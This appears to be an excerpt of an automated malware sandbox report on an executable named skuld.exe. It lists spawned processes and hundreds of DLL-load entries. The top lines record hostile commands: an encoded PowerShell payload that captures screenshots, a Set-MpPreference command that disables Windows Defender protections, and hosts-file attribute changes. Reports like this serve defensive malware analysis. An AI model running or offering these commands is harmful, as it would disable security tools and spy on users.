                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
